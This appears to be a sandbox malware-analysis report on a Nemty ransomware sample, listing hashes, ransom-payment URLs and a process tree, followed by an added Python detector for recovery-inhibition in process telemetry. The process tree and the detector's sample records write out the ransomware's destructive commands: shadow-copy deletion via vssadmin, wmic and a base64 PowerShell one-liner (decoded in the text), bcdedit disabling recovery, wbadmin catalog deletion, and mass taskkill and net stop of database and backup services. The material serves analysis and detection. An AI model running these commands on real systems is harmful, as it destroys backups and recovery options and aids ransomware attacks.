Analysis
max time kernel: 62s
max time network: 98s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 01-02-2022 07:18

Static task: static1
Behavioral task: behavioral1
  Sample: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
  Resource: win10v2004-en-20220113
General
Target: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
Size: 87KB
MD5: c96613c857018555f3a5bc227567e6e7
SHA1: a402f5e46c8e056c9e9494f7e83902e0fcae3a61
SHA256: 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3
SHA512: 086fa536e03882efe6eb79a6f56d954205e00c37885f5d23f8eae47702125d7fed2a8c76d6d2e01d6eeb175f273185844a6494847bef2f0f805560867f075c41
Malware Config
Extracted from: C:\NEMTY_WJ29D2J-DECRYPT.txt
Family: nemty
URLs:
  http://nemty.top/public/pay.php
  http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
Signatures
(PID 3088 is the sample, 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe; it is written as "the sample" in the tables below.)

Nemty
  Ransomware discovered in late 2019 which has been actively developed/updated over time.

Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Process     Description        IoC
  the sample  Key value queried  \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation

Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow  IoC
  17    api.ipify.org
  19    api.db-ip.com

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Kills process with taskkill (7 IoCs)
  PID   Process
  4716  taskkill.exe
  3660  taskkill.exe
  216   taskkill.exe
  2780  taskkill.exe
  4236  taskkill.exe
  1432  taskkill.exe
  4284  taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID   Process     Events
  3088  the sample  2

Suspicious use of AdjustPrivilegeToken (48 IoCs)
  Process       PID   Privileges enabled
  WMIC.exe      2076  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privileges 33, 34, 35, 36 (reported by number only); this full set of 21 is adjusted twice (42 events)
  taskkill.exe  4284  SeDebugPrivilege
  taskkill.exe  4716  SeDebugPrivilege
  taskkill.exe  3660  SeDebugPrivilege
  taskkill.exe  216   SeDebugPrivilege
  taskkill.exe  2780  SeDebugPrivilege
  taskkill.exe  4236  SeDebugPrivilege

Suspicious use of WriteProcessMemory (48 IoCs)
  Source (PID, process)  Target (PID, process)  Events
  3088 the sample        1128 cmd.exe           3
  3088 the sample        1444 cmd.exe           3
  3088 the sample        4508 cmd.exe           3
  3088 the sample        4100 cmd.exe           3
  3088 the sample        2416 cmd.exe           3
  4508 cmd.exe           4284 taskkill.exe      3
  4100 cmd.exe           3772 net.exe           3
  3772 net.exe           4352 net1.exe          3
  2416 cmd.exe           2076 WMIC.exe          3
  3088 the sample        4448 powershell.exe    3
  4508 cmd.exe           4716 taskkill.exe      3
  4508 cmd.exe           3660 taskkill.exe      3
  4508 cmd.exe           216 taskkill.exe       3
  4508 cmd.exe           2780 taskkill.exe      3
  4508 cmd.exe           4236 taskkill.exe      3
  4508 cmd.exe           1432 taskkill.exe      3
Processes

The sample runs under WOW64 (it is a 32-bit image): every child it launches executes from C:\Windows\SysWOW64 even though the command line names C:\Windows\System32, because the file-system redirector rewrites that path for 32-bit processes. Indentation below follows the report's depth markers (1 = top level, 2 = child of the sample, 3 = grandchild, 4 = great-grandchild); the first line of each entry is the image path, the second its command line. Not every command in these chains shows up as a recorded child: the tree lists no vssadmin, bcdedit or wbadmin process, only seven of the fourteen taskkill invocations, and two of the sixteen net stop invocations.

1  C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
   "C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"
   - Checks computer location settings
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory

   2  C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB

   2  C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      (Shrinking the shadow storage to 401MB forces VSS to discard the snapshots that no longer fit; setting it back to unbounded afterwards leaves the volume configuration looking untouched. This pair is the first of three shadow-copy removal methods in the tree, alongside wmic shadowcopy delete and the encoded PowerShell below.)

   2  C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
      - Suspicious use of WriteProcessMemory
      (Killing office, mail, database and VM processes releases file locks so the encryptor can open the documents those programs hold.)

      3  C:\Windows\SysWOW64\taskkill.exe
         taskkill /f /im sql.*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken

      3  C:\Windows\SysWOW64\taskkill.exe
         taskkill /f /im winword.*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken

      3  C:\Windows\SysWOW64\taskkill.exe
         taskkill /f /im wordpad.*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken

      3  C:\Windows\SysWOW64\taskkill.exe
         taskkill /f /im outlook.*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken

      3  C:\Windows\SysWOW64\taskkill.exe
         taskkill /f /im thunderbird.*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken

      3  C:\Windows\SysWOW64\taskkill.exe
         taskkill /f /im oracle.*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken

      3  C:\Windows\SysWOW64\taskkill.exe
         taskkill /f /im excel.*
         - Kills process with taskkill

   2  C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
      - Suspicious use of WriteProcessMemory
      (The service list mixes database engines with backup agents such as Acronis, Cobian and QuickBooks VSS, so that neither open database files nor running backups stand in the way of encryption.)

      3  C:\Windows\SysWOW64\net.exe
         net stop DbxSvc
         - Suspicious use of WriteProcessMemory

         4  C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop DbxSvc

      3  C:\Windows\SysWOW64\net.exe
         net stop OracleXETNSListener

         4  C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop OracleXETNSListener

   2  C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
      - Suspicious use of WriteProcessMemory
      (bcdedit disables the Windows Recovery Environment and boot-failure prompts, wbadmin removes the Windows Backup catalog, and wmic deletes shadow copies through WMI.)

      3  C:\Windows\SysWOW64\Wbem\WMIC.exe
         wmic shadowcopy delete
         - Suspicious use of AdjustPrivilegeToken

   2  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64 over UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which deletes every shadow copy through WMI, the third removal method in the tree.)

1  C:\Windows\system32\vssvc.exe
   C:\Windows\system32\vssvc.exe
   (The Volume Shadow Copy service. It sits at the top level because the service control manager starts it on demand in response to the shadow-copy requests above; the sample did not spawn it.)
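The chain above (resize shadow storage, kill document-holding processes, stop database and backup services, disable recovery, delete shadow copies three different ways) is the detection surface a SOC engineer gets from process-creation telemetry before any file is encrypted. The following is an added example, not code from the Triage report or from the Nemty sample: a small Python detector that runs rules over command lines, decodes any PowerShell -EncodedCommand payload so the rules also see the real script, attributes every hit to the root of its process tree, and only raises the "inhibit-system-recovery" verdict when two or more distinct recovery-inhibition techniques come from one tree (a lone vssadmin resize can be an administrator). The record layout (pid/ppid/image/cmdline) is an assumed Sysmon-Event-1 subset, the regexes are my generalisation of the commands shown, SAMPLE_RECORDS is constructed to mirror the process tree (PIDs from the report's WriteProcessMemory table, parent PID 900 and the final -ExecutionPolicy record are invented), and the rule names are my own.

```python
"""Flag ransomware recovery-inhibition in process-creation telemetry.
Added example, not code from the Triage report or the Nemty sample; the
record layout (pid/ppid/image/cmdline) is an assumed Sysmon-Event-1 subset."""
import base64
import re
from collections import Counter

# Rules generalised from the commands in the report's process tree. A capture
# group, where present, extracts the target (process or service name).
RULES = [
    ("shadow_storage_resize", re.compile(r"vssadmin(?:\.exe)?\s+resize\s+shadowstorage", re.I)),
    ("shadow_copy_delete", re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete|win32_shadowcopy.*?\.delete\(", re.I)),
    ("boot_recovery_disable", re.compile(r"bcdedit(?:\.exe)?\s+/set\b.*?(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("backup_catalog_delete", re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I)),
    ("process_kill", re.compile(r"taskkill(?:\.exe)?\s+[^&|]*?/im\s+(\S+)", re.I)),
    ("service_stop", re.compile(r"\bnet1?(?:\.exe)?\s+stop\s+(\S+)", re.I)),
]
INHIBIT_RECOVERY = {"shadow_storage_resize", "shadow_copy_delete",
                    "boot_recovery_disable", "backup_catalog_delete"}
# powershell.exe accepts -ec and any unambiguous prefix of -EncodedCommand
ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a -EncodedCommand argument, or None."""
    for m in ENC_FLAG.finditer(cmdline):
        flag, payload = m.group(1).lower(), m.group(2)
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy Bypass
        try:
            return base64.b64decode(payload, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def analyse(cmdline):
    """Return [(category, detail)] for one command line, decoded payload included."""
    text, findings = cmdline, []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(("powershell_encoded", decoded))
        text = cmdline + " " + decoded  # run the rules over the real script too
    for category, rx in RULES:
        for m in rx.finditer(text):
            findings.append((category, m.group(1) if rx.groups else m.group(0)))
    return findings


def triage(records):
    """Attribute every finding to the root ancestor of its process, then score."""
    by_pid = {r["pid"]: r for r in records}

    def root_of(pid):
        for _ in range(len(by_pid)):  # bounded walk: PID reuse can form cycles
            if by_pid[pid]["ppid"] not in by_pid:
                break
            pid = by_pid[pid]["ppid"]
        return pid

    report = {}
    for r in records:
        for category, detail in analyse(r["cmdline"]):
            entry = report.setdefault(root_of(r["pid"]), {"categories": Counter(), "findings": []})
            entry["categories"][category] += 1
            entry["findings"].append((r["pid"], category, detail))
    for entry in report.values():
        # Two or more distinct recovery-inhibition techniques under one root is the
        # ransomware pattern; a lone vssadmin resize may be an administrator.
        hits = INHIBIT_RECOVERY & set(entry["categories"])
        entry["verdict"] = "inhibit-system-recovery" if len(hits) >= 2 else "review"
    return report


def targets(entry, category):
    """Distinct targets (process or service names) recorded for a category."""
    return sorted({d for _, c, d in entry["findings"] if c == category})


NEMTY_ENCODED = ("RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
                 "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==")
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"
CMD_EXE = r"C:\Windows\SysWOW64\cmd.exe"
CMD = r'"C:\Windows\System32\cmd.exe" /c '
PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
# Constructed telemetry mirroring the report's process tree as (pid, ppid, image, cmdline).
# PIDs come from the report's WriteProcessMemory table; 900 is an invented launcher PID.
SAMPLE_RECORDS = [dict(zip(("pid", "ppid", "image", "cmdline"), t)) for t in [
    (3088, 900, SAMPLE, '"' + SAMPLE + '"'),
    (1128, 3088, CMD_EXE, CMD + "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"),
    (1444, 3088, CMD_EXE, CMD + "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded"),
    (4508, 3088, CMD_EXE, CMD + "taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*"),
    (4100, 3088, CMD_EXE, CMD + "net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS"),
    (3772, 4100, r"C:\Windows\SysWOW64\net.exe", "net stop DbxSvc"),
    (4352, 3772, r"C:\Windows\SysWOW64\net1.exe", r"C:\Windows\system32\net1 stop DbxSvc"),
    (2416, 3088, CMD_EXE, CMD + "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete"),
    (4448, 3088, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS + "-e " + NEMTY_ENCODED),
    (5000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS + "-ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),  # invented benign noise
]]

if __name__ == "__main__":
    print({k: (v["verdict"], dict(v["categories"])) for k, v in triage(SAMPLE_RECORDS).items()})
```

Run stand-alone, triage(SAMPLE_RECORDS) produces a single entry rooted at PID 3088 with the "inhibit-system-recovery" verdict and nothing for the benign PowerShell record, because -ExecutionPolicy is rejected as a non-prefix of -EncodedCommand before any base64 decoding is attempted. Attributing hits to the tree root rather than to the individual cmd.exe or net1.exe is what lets the two-technique threshold work: each child on its own looks like routine administration.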